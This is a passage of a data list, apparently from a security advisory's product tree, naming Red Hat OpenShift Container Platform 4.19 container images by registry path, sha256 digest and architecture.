"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
